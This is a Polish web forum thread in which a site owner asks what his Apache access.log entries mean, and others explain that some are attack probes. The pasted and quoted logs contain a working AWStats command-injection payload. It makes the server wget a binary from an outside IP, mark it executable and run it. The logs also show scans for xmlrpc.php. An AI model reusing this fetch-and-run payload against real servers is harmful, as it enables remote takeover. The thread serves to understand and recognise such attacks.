Witaj Gościu! ( Zaloguj | Rejestruj )

Forum PHP.pl

 
 Reply to this topicStart new topic
> acess.log w Apache'u, Co znaczą wpisy?
Coolmax
post
Post #1





Grupa: Zarejestrowani
Postów: 168
Pomógł: 0
Dołączył: 12.11.2005
Skąd: Bulowice nearby Wadowice (E), Oświęcim (W)

Ostrzeżenie: (0%)
-----

Mam taki banalny problem, co oznacza że jakieś ip "coś zrobiło" i np. jest taki wpis:

xx.xx.xxx.xx - - [18/Nov/2005:14:09:07 +0100] "GET / HTTP/1.0" 200 1282

Chodzi mi co oznacza get http 1.0, i te numery na końcu. Jeśli byłby ktoś miły mi wytłumaczyć, to z góry bardzo dziękuje!
Go to the top of the page
+Quote Post
Lars
post
Post #2





Grupa: Zarejestrowani
Postów: 279
Pomógł: 15
Dołączył: 29.04.2005
Skąd: Gdynia

Ostrzeżenie: (0%)
-----

wyslanie do klienta przez apacza strony - użycie GET [przesył przez urla]
Go to the top of the page
+Quote Post
ghostrider
post
Post #3





Grupa: Zarejestrowani
Postów: 135
Pomógł: 0
Dołączył: 30.09.2005
Skąd: k-rk

Ostrzeżenie: (0%)
-----

http://httpd.apache.org/docs/2.0/logs.html

... i wszystko jasne, google to taka wyszukiwarka internetowa, czasem sie przydaje (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg)

Ten post edytował ghostrider 19.11.2005, 12:22:32
Go to the top of the page
+Quote Post
Coolmax
post
Post #4





Grupa: Zarejestrowani
Postów: 168
Pomógł: 0
Dołączył: 12.11.2005
Skąd: Bulowice nearby Wadowice (E), Oświęcim (W)

Ostrzeżenie: (0%)
-----

OK. A jeśli z kilkunastu o ile nie z kilkudziesięciu (przeważnie z neo {83.29.xx}) ip jest tylko taka linijka "83.29.33.207 - - [19/Nov/2005:17:51:20 +0100] "GET / HTTP/1.0" 200 1282" - to co?
Jak ktoś wchodzi na moją stronkę to widzę bo jest get + jakiś tam plik. W dokumentacji z http://httpd.apache.org/docs/2.0/logs.html nie ma tam takiego przypadku. Podejrzewałem, że to jakieś roboty przeszukujące strony ale głównie ty były, tak jak pisałem, ip neostrady

Oto poniższy log:
Kod
83.29.66.94 - - [18/Nov/2005:17:50:10 +0100] "GET / HTTP/1.0" 200 1282
127.0.0.1 - - [18/Nov/2005:21:08:51 +0100] "GET /pagead/show_ads.js HTTP/1.1" 404 -
83.29.183.62 - - [19/Nov/2005:13:07:43 +0100] "GET /pliki/time/c3.gif HTTP/1.1" 304 -


Także nie wiem co oznaczają poniższe linijki:
Kod
81.73.6.69 - - [19/Nov/2005:18:01:20 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo
%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen
%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 -
81.73.6.69 - - [19/Nov/2005:18:01:22 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd
%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e
%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 -
81.73.6.69 - - [19/Nov/2005:18:01:25 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo
%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen
%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo|  HTTP/1.1" 404 -
81.73.6.69 - - [19/Nov/2005:18:01:27 +0100] "POST /xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:32 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:35 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:37 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:40 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:42 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:44 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:47 +0100] "POST /xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:51 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:54 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 -


po wejściu na stronę http://81.73.6.69 pisze "Media Free Knowledge" a host to host69-6.pool8173.interbusiness.it
Kod
83.29.80.210 - - [19/Nov/2005:18:10:48 +0100] "GET / HTTP/1.0" 200 1282
83.29.235.11 - - [19/Nov/2005:18:23:39 +0100] "GET / HTTP/1.0" 200 1282
127.0.0.1 - - [19/Nov/2005:21:54:12 +0100] "GET /i.gif HTTP/1.1" 404 -
127.0.0.1 - - [19/Nov/2005:21:54:13 +0100] "GET /0.gif?tag=crackspl&j=y&srw=1024&srb=32&l= HTTP/1.1" 404 -


//Edit: Ściąłem loga - odciążyłem baze (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg)

Ten post edytował Coolmax 11.07.2006, 21:16:48
Go to the top of the page
+Quote Post
Fo
post
Post #5





Grupa: Zarejestrowani
Postów: 401
Pomógł: 0
Dołączył: 18.04.2003
Skąd: Trójmiasto

Ostrzeżenie: (0%)
-----

ostatnio był taki wyjątek w aplikacji która bodajże nazywała się phpAdsNew
problem był z xmlrpc, wielu ludzi się na to nadziało. dzięki tej dziurze, można było wywołać zdalnie np. skrypcik cgi.... ogólnie nie smaczne a u Ciebie te linijki
Cytat("Coolmax")
81.73.6.69 - - [19/Nov/2005:18:01:27 +0100] "POST /xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:32 +0100] "POST /blog/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:35 +0100] "POST /blog/xmlsrv/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:37 +0100] "POST /blogs/xmlsrv/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:40 +0100] "POST /drupal/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:42 +0100] "POST /phpgroupware/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:44 +0100] "POST /wordpress/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:47 +0100] "POST /xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:51 +0100] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 400 -
81.73.6.69 - - [19/Nov/2005:18:01:54 +0100] "POST /xmlrpc/xmlrpc.php HTTP/1.1" 400 -


mówią nic więcej nic mnie jak to że ktoś próbował przesłać jakieś dane do pliczków xmlrpc.php - zapewne szukał luki (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg)

ciekawe też jest to:
Cytat("Coolmax")
81.73.6.69 - - [19/Nov/2005:18:01:20 +0100] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 -
81.73.6.69 - - [19/Nov/2005:18:01:22 +0100] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 -
81.73.6.69 - - [19/Nov/2005:18:01:25 +0100] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bchmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e212%2e115;echo%20YYY;echo| HTTP/1.1" 404 -


ktoś chciał sprawdzić czy masz awstats i pobawić się w szpiega (IMG:http://forum.php.pl/style_emoticons/default/smile.gif)

Ogólnie: SCRIPT KIDDIES GO HOME

pzdr.

edit. : http://hacking.pl/5600 (IMG:http://forum.php.pl/style_emoticons/default/winksmiley.jpg)

Ten post edytował Fo 20.11.2005, 22:11:47
Go to the top of the page
+Quote Post
Coolmax
post
Post #6





Grupa: Zarejestrowani
Postów: 168
Pomógł: 0
Dołączył: 12.11.2005
Skąd: Bulowice nearby Wadowice (E), Oświęcim (W)

Ostrzeżenie: (0%)
-----

Nie wie ktoś czym różni się na końcu liczba 1282 od 1494 i jak się one nazywają, bo spróbuje znaleźć jakąś dokumentację do nich (chyba że ktoś wie gdzie ona jest).
Go to the top of the page
+Quote Post
« Następny starszy · Apache · Następny nowszy »
 

Reply to this topicStart new topic
2 Użytkowników czyta ten temat (2 Gości i 0 Anonimowych użytkowników)
0 Zarejestrowanych:

 

Tryb wyświetlania: Standardowy · Przełącz na: Linearny+ · Przełącz na: Drzewo

Śledź ten temat · Wyślij temat na e-mail · Wydrukuj ten temat · Subskrybuj to forum

RSS Aktualny czas: 28.08.2025 - 16:19
Powered By IP.Board © 2025  IPS, Inc.
All changes by PHP.pl Administrators
Hosting zapewnia NQ.pl hosting, trac, svn